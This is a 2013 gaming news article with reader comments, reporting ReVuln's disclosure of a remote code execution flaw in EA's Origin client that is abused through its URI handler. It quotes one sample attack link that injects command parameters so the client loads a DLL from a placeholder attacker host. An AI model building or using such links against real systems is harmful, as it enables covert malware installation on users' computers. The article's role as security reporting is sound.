Report: Researchers Uncover Serious Vulnerability in Origin Client

March 18, 2013 -

According to this Ars Technica report a serious bug in the client for EA's Origin digital distribution service could allow attackers to remotely execute malicious code on players' computers. The attack was demonstrated last week at the Black Hat security conference in Amsterdam, and it apparently only takes a few seconds to execute. Researchers from Malta-based ReVuln (@revuln) told Ars Technica that - in some cases - the hacker doesn't even have to have interaction with a victim.

In some cases, it requires no interaction by victims, researchers from Malta-based ReVuln (@revuln) told Ars. It works by manipulating the uniform resource identifiers EA's site uses to automatically start games on an end user's machine. By exploiting flaws in the Origin application available for both Macs and PCs, the technique turns EA's popular game store into an attack platform that can covertly install malware on customers' computers.

"The Origin platform allows malicious users to exploit local vulnerabilities or features by abusing the Origin URI handling mechanism," ReVuln researchers Donato Ferrante and Luigi Auriemma wrote in a paper as part of last week's demonstration. "In other words, an attacker can craft a malicious Internet link to execute malicious code remotely on [a] victim's system, which has Origin installed."

The demo shows researchers taking control of a computer with Origin installed remotely and installing Crysis 3. Ars notes that Origin uses the origin://LaunchGame/71503 link to activate a game. When a victim clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows DLL file of the attackers' choosing on the victim's computer.

The exploit is similar to one found on Valve's Steam client uncovered back in October of 2012. Ars Technica has a whole lot more on the Origin vulnerability here. We have reached out to Electronic Arts for comment on this story and will provide an update if it responds.

Source: Ars Technica

 


Comments

Re: Report: Researchers Uncover Serious Vulnerability in ...

Booby Trapped URI's. What a shocker. Better blame EA!

Re: Report: Researchers Uncover Serious Vulnerability in ...

Yep. I blame EA. Ubisoft's UPlay service had the exact same flaw that was widely reported. Had EA engineers been paying attention, they would have been watching for it in their own application.

http://gamepolitics.com/2012/07/30/report-security-hole-found-ubisofts-d...

Re: Report: Researchers Uncover Serious Vulnerability in ...

I'll also point out that such was a really poor showing by Ubisoft considering that Steam also fell victim to this just last year. This indicates that EA had not one but two chances to identify and correct any vulnerabilities in their program. To that end, they still have not issued a patch.

----
Papa Midnight

Re: Report: Researchers Uncover Serious Vulnerability in ...

Hope EA can fix this exploit quickly. Sometimes I wish some other company owned the Sims franchise because of the bad reputation EA's been getting recently... =/

Re: Report: Researchers Uncover Serious Vulnerability in ...

Looks like some more fodder for the Computer Fraud and Abuse Act cannon.

Re: Report: Researchers Uncover Serious Vulnerability in ...

By exploiting flaws in the Origin application available for both Macs and PCs, the technique turns EA's popular game store into an attack platform that can covertly install malware on customers' computers.

Popular? And wasn't that was Origin was designed to do in the first place?

 

Re: Report: Researchers Uncover Serious Vulnerability in ...

Considering that essentially every sale of an EA published game starting with Battlefield 3 and Mass Effect 3 (and continuing on to this day) is equal to an installation of Origin, then yes, it is fair to describe it as popular whether we like it or not; and considering the number of sales of Sims related titles...

----
Papa Midnight

 
Forgot your password?
Username :
Password :

Poll

Should 'Hatred' have been removed from Steam Greenlight?:
 

Be Heard - Contact Your Politician